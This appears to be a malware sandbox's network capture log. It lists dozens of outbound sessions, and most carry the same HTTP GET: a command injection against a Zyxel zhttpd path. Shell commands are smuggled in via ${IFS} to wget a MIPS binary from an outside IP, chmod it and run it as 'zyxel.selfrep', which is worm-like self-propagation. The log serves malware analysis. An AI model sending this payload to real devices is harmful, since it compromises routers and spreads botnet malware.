                                      Jan 14, 2024 15:50:42.200485945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3151192.168.2.1457078129.58.58.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200520992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3152192.168.2.1440766108.81.241.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200577974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3153192.168.2.1433046122.200.210.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200628996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3154192.168.2.144943491.130.188.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200664997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3155192.168.2.143760874.17.211.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200750113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3156192.168.2.1453956151.118.119.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200781107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3157192.168.2.1444430155.141.87.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200850010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3158192.168.2.1452746132.7.248.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200908899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3159192.168.2.1457484110.93.130.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200969934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3160192.168.2.144896288.229.101.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201037884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3161192.168.2.1438934197.38.10.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201109886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3162192.168.2.1457126115.36.222.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201168060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3163192.168.2.1450086123.142.140.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201201916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3164192.168.2.1437544194.144.201.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201244116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3165192.168.2.145991474.189.169.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201308966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3166192.168.2.144682844.90.175.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201376915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3167192.168.2.1449314105.107.127.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201450109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3168192.168.2.1456278131.97.36.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201518059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3169192.168.2.1445048101.93.63.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201570988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3170192.168.2.1446800145.34.220.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201626062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3171192.168.2.1443822177.73.195.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201684952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3172192.168.2.1460868130.68.89.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201719999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3173192.168.2.145683882.28.159.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201792002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3174192.168.2.1454922159.2.39.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201862097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3175192.168.2.145725475.109.176.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201930046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3176192.168.2.144295481.166.178.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.201948881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3177192.168.2.14477389.138.5.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202012062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3178192.168.2.1446694179.225.194.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202066898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3179192.168.2.1458092110.90.204.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202167988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3180192.168.2.143344490.249.30.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202171087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3181192.168.2.1437392113.246.226.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202267885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3182192.168.2.145941259.64.246.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202291965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3183192.168.2.1435156179.142.244.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202321053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3184192.168.2.143728298.205.55.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202353954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3185192.168.2.1457028220.29.115.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202430010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3186192.168.2.145701299.226.228.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202476978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3187192.168.2.145930427.236.59.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202558041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3188192.168.2.1438082128.159.189.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202588081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3189192.168.2.1441360196.230.113.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202662945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3190192.168.2.146034417.25.89.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202701092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3191192.168.2.145573267.52.42.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202733040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3192192.168.2.1444342198.32.47.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202816963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3193192.168.2.1447376132.255.71.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202871084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3194192.168.2.146042858.82.1.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202913046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3195192.168.2.145420281.103.177.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.202969074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3196192.168.2.14371801.19.135.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203036070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3197192.168.2.143687447.13.41.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203090906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3198192.168.2.145077268.62.201.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203139067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3199192.168.2.144037088.156.181.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203203917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3200192.168.2.1453082129.86.182.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203267097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3201192.168.2.1437370173.154.78.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203331947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3202192.168.2.1440222223.38.134.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203371048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3203192.168.2.145094835.47.165.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203423023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3204192.168.2.1449284139.130.242.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203485966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3205192.168.2.1459704174.93.225.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203558922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3206192.168.2.1442504197.157.247.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203593969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3207192.168.2.1454410216.188.99.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203655958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3208192.168.2.144535218.50.254.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203696012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3209192.168.2.143380848.28.2.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203753948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3210192.168.2.1441998213.82.47.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203815937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3211192.168.2.1437002140.191.34.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203856945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3212192.168.2.144773265.68.141.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.203921080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3213192.168.2.145813897.21.153.133443
                                      TimestampBytes transferredDirectionData
